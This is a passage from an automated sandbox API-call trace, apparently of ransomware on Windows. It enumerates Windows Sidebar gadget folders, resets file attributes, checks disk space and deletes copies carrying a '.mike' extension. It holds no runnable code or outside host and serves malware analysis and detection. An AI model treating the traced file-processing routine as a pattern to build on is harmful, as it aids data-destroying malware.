Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png", dwFileAttributes=0x80) returned 0 [0103.903] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png.mike")) returned 1 [0103.906] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png", dwFileAttributes=0x80) returned 0 [0103.911] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png.mike")) returned 1 [0103.914] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png", dwFileAttributes=0x80) returned 0 [0103.927] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png.mike")) returned 1 [0103.929] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png", dwFileAttributes=0x80) returned 0 [0103.934] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png.mike")) returned 1 [0103.937] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png", dwFileAttributes=0x80) returned 0 [0103.942] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png.mike")) returned 1 [0103.944] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png", dwFileAttributes=0x80) returned 0 [0103.949] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png.mike")) returned 1 [0103.952] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png", dwFileAttributes=0x80) returned 0 [0103.957] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png.mike")) returned 1 [0103.959] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png", dwFileAttributes=0x80) returned 0 [0103.964] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass.png.mike")) returned 1 [0103.967] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png", dwFileAttributes=0x80) returned 0 [0103.971] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass_lrg.png.mike")) returned 1 [0103.972] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7432440, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x7432440, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.972] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290d46f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x42e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="back.png", cAlternateFileName="")) returned 1 [0103.972] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6651, dwReserved0=0x0, dwReserved1=0x0, cFileName="back_lrg.png", cAlternateFileName="")) returned 1 [0103.972] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290fa853, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x290fa853, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x15a, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial.png", cAlternateFileName="")) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc91, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialdot.png", cAlternateFileName="")) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xfca, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialdot_lrg.png", cAlternateFileName="")) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84291931, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84291931, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_lrg.png", cAlternateFileName="")) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84291931, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84291931, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291209b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_lrg_sml.png", cAlternateFileName="")) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8426b7d4, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8426b7d4, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291209b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_sml.png", cAlternateFileName="")) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x134, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass.png", cAlternateFileName="")) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84303d48, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84303d48, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass_lrg.png", cAlternateFileName="")) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84303d48, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84303d48, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass_lrg.png", cAlternateFileName="")) returned 0 [0103.973] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0103.973] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.973] CoTaskMemFree (pv=0x506980) [0103.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0103.974] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.974] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x871223e6, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x871223e6, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296096cf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x406b, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0103.975] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0103.975] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x296c7da5, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x296c7da5, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1ae9, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0103.975] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8063a49c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8063a49c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0103.975] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870fc289, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x870fc289, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29e5e35f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0103.975] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0103.976] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0103.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0103.985] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\drag.png.mike")) returned 1 [0103.988] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0103.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0104.001] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\icon.png.mike")) returned 1 [0104.003] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0104.009] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\logo.png.mike")) returned 1 [0104.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x747e700, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x74a4860, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x871223e6, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x871223e6, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296096cf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x406b, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0104.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0104.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x296c7da5, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x296c7da5, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1ae9, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0104.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8063a49c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8063a49c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0104.010] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870fc289, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x870fc289, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29e5e35f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0104.011] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870fc289, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x870fc289, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29e5e35f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0104.011] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.011] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.011] CoTaskMemFree (pv=0x506980) [0104.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.011] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.011] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0104.011] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1792, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.html", cAlternateFileName="")) returned 1 [0104.011] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0104.012] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0104.012] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0104.013] 